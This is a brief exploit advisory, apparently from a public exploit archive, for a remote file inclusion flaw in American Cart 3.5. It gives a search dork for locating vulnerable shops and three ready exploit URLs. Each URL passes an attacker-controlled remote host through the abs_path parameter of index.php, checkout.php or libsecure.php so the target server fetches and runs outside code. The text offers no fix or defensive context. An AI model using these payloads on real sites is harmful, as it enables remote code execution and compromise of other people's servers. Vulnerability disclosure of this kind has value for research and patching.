American Cart version 3.5 suffers from a remote file inclusion vulnerability.
d97de9b1adeb342b1cb6deb0bc72f55c7c8e482ffc516f092646fc17889a331f
# american cart 3.5 (abs_path) remote file include
# script Vendor: http://americancart.us
# Discovered by: IbnuSina
# Dork : "powered by american cart"
=================
exploitz :
http://target.lu/[americanpath]/index.php?abs_path=injekan.lu?
http://target.lu/[americanpath]/checkout.php?abs_path=injekan.lu?
http://target.lu/[americanpath]/libsecure.php?abs_path=injekan.lu?